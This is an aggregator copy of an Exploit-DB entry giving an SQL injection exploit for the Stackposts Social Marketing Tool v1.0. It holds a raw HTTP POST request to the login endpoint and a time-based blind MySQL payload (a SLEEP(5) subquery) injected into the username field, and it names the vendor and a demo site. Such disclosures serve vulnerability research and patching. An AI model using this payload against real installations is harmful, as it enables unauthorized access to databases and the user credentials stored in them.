1
[webapps] Stackposts Social Marketing Tool v1.0 - SQL Injection
source link: https://www.exploit-db.com/exploits/51473
Go to the source link to view the article. You can view the picture content, updated content and better typesetting reading experience. If the link is broken, please click the button below to view the snapshot at that time.
Stackposts Social Marketing Tool v1.0 - SQL Injection
EDB-ID:
51473
EDB Verified:
# Exploit Title: Stackposts Social Marketing Tool v1.0 - SQL Injection
# Date: 2023-05-17
# Exploit Author: Ahmet Ümit BAYRAM
# Vendor:
https://codecanyon.net/item/stackposts-social-marketing-tool/21747459
# Demo Site: https://demo.stackposts.com
# Tested on: Kali Linux
# CVE: N/A
### Request ###
POST /spmo/auth/login HTTP/1.1
X-Requested-With: XMLHttpRequest
Referer: https://localhost/spmo/
Content-Type: application/x-www-form-urlencoded
Accept: application/json, text/javascript, */*; q=0.01
Content-Length: 104
Accept-Encoding: gzip,deflate,br
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36
(KHTML, like Gecko) Chrome/109.0.0.0 Safari/537.36
Host: localhost
Connection: Keep-alive
csrf=eb39b2f794107f2987044745270dc59d&password=1&username=1*
### Parameter & Payloads ###
Parameter: username (POST)
Type: time-based blind
Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
Payload: csrf=eb39b2f794107f2987044745270dc59d&password=1&username=1')
AND (SELECT 9595 FROM (SELECT(SLEEP(5)))YRMM) AND ('gaNg'='gaNg
Recommend
About Joyk
Aggregate valuable and interesting links.
Joyk means Joy of geeK